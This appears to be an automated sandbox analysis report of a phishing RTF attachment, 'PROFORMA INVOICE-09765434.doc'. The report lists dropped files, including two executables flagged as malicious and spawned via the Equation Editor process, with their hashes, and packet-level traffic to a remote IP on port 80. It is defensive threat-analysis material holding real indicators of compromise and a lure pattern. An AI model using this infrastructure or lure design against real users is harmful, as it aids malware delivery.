SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\gDgbkskgY.exe Download File
Process:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1079808
Entropy (8bit):	7.53477738688699
Encrypted:	false
SSDEEP:	12288:VKKMUipAhZHRAX0WG1nQQ5dTFX93W3z4GJmMc07EUbOFdnL2PFIq5QXKS8:VKKNewrAXPGhHhX9m3sGJW2zb+seq68
MD5:	AA1F1EEBD208B4A2BC51CBD86C0E4FB0
SHA1:	C8E21DB93E1A7F550E2D090DE7EC91DE25464CCF
SHA-256:	4BD15467CE260CB5A4F9B8C9176369E0CAC646A96E2BA564A077F4E7190331A2
SHA-512:	6C33B781A35D2AF18C18A9D074BB7D2DB4DA93586C1ECC665DA4C1AE55226374B0A0B81CAEEC2ECB8FF24FCBFEA315F577674F4B3324B7A8B029BE0DA7851CA7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.`..............P..^...........}... ........@.. ....................................@..................................\|..O.......0............................................................................ ............... ..H............text....]... ...^.................. ..`.rsrc...0............`..............@..@.reloc...............x..............@..B.................\|......H............j..........................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....o....(4....&..(5.....s6........s7........s8........s9........s:............0...........~....o;....+...0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+..&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....

C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1079808
Entropy (8bit):	7.53477738688699
Encrypted:	false
SSDEEP:	12288:VKKMUipAhZHRAX0WG1nQQ5dTFX93W3z4GJmMc07EUbOFdnL2PFIq5QXKS8:VKKNewrAXPGhHhX9m3sGJW2zb+seq68
MD5:	AA1F1EEBD208B4A2BC51CBD86C0E4FB0
SHA1:	C8E21DB93E1A7F550E2D090DE7EC91DE25464CCF
SHA-256:	4BD15467CE260CB5A4F9B8C9176369E0CAC646A96E2BA564A077F4E7190331A2
SHA-512:	6C33B781A35D2AF18C18A9D074BB7D2DB4DA93586C1ECC665DA4C1AE55226374B0A0B81CAEEC2ECB8FF24FCBFEA315F577674F4B3324B7A8B029BE0DA7851CA7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5.`..............P..^...........}... ........@.. ....................................@..................................\|..O.......0............................................................................ ............... ..H............text....]... ...^.................. ..`.rsrc...0............`..............@..@.reloc...............x..............@..B.................\|......H............j..........................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....o....(4....&..(5.....s6........s7........s8........s9........s:............0...........~....o;....+...0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+..&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....

C:\Users\user\Desktop\~$OFORMA INVOICE-09765434.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.196236193717874
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PROFORMA INVOICE-09765434.doc
File size:	3597
MD5:	d99ceb3c7f74e1aef9cf5b9c6fab21a9
SHA1:	a0434766ec18e38d7262994fcd18d01d4b41b2b6
SHA256:	fb9536272584329c624805aaa8a50b88b737a9e89a8430bbc8b5d0626dda17fb
SHA512:	acf8fd8dd254ab8f35d759ce5f0df95b421761e742f62a30e670bdbf1d31da60b65453b4dd37199aae0afb9fad1c194a773950243ff46bdd0d17726c8f99ba83
SSDEEP:	96:+UHXpEy0s3yB21o/hCtqPxodFgv6EC7ZTAz36/5gkuy:+U3pENs3O2aQK4A6bZTAL6/5puy
File Content Preview:	{\rtf7934{\object34792695 34792695\objautlink\objw9190\objh3633{\\objdata925698 {\mrSp7090 7090\ 7090 \mrSp7090 7090\.7090} \\ansi.

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000004Ch								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 4, 2021 09:05:18.432924986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.637119055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.637353897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.637748003 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.834992886 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.844858885 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.844906092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.844935894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.844969988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845004082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845021963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845041037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845067024 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845073938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845078945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845079899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845086098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845119953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845125914 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845156908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845184088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845200062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:18.845212936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.845293045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:18.853283882 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.042757988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042792082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042819977 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042848110 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042872906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.042876005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042906046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042908907 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.042923927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.042931080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042946100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.042962074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.042995930 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043036938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043042898 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043061972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043095112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043111086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043123960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043128014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043158054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043164015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043189049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043200970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043212891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043220043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043248892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043263912 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043278933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043286085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043298006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043314934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.043467045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043493986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043505907 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043513060 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.043720007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310175896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310251951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310278893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310311079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310313940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310369968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310374022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310430050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310477018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310519934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310534954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310544014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310549021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310590982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310596943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310650110 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310656071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310709953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310710907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310769081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310784101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310823917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310825109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310869932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310882092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310911894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310924053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310952902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.310961008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.310992002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311006069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311033964 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311043024 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311075926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311083078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311120987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311121941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311167955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311202049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311208963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311220884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311249971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311261892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311292887 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.311306953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.311353922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.508608103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508651018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508671045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508687973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508703947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508722067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508743048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508769035 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508795023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508816957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508840084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508861065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508882046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508903980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508941889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508966923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.508992910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.509008884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509016991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.509049892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509056091 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509059906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509063959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509068012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509072065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509076118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509078979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509082079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509090900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509115934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509120941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509124041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509130955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509143114 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509146929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.509177923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.705826998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.705986023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706006050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706017971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706034899 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706047058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706059933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706096888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706115007 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706119061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706126928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706146955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706161022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706161976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706167936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706171989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706175089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706178904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706181049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706197977 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706232071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706238031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706302881 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706321955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706326962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706345081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.706397057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.706456900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.712666035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.903791904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.903871059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.903932095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.903944016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.903989077 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.903990984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.903994083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904052973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904071093 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904110909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904125929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904166937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904187918 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904227972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904227972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904288054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904305935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904345036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904352903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904411077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904429913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904467106 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.904468060 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.904542923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.905154943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.905256987 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.906821966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:19.909665108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:19.909770966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.101157904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101198912 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101231098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101247072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101263046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101300001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101322889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101349115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101371050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101459026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101480961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101506948 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101505995 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.101555109 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.101558924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.101686954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101710081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.101778030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.103446960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.107016087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.107153893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298549891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298613071 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298651934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298683882 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298727036 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298777103 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298784018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298811913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298825026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298826933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298841000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298866034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298887014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298902035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298906088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298933029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298945904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.298963070 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.298995972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.299001932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.299038887 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.299072027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.299077034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.299101114 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.299133062 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.301578999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.301704884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.496041059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.496295929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.496354103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.496470928 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.496531010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.496640921 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.496712923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.496819019 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.496880054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.497049093 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.497111082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.497221947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.497272015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.497370005 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.497483015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:20.497596025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:20.497648954 CET	80	49165	43.252.37.193	192.168.2.22
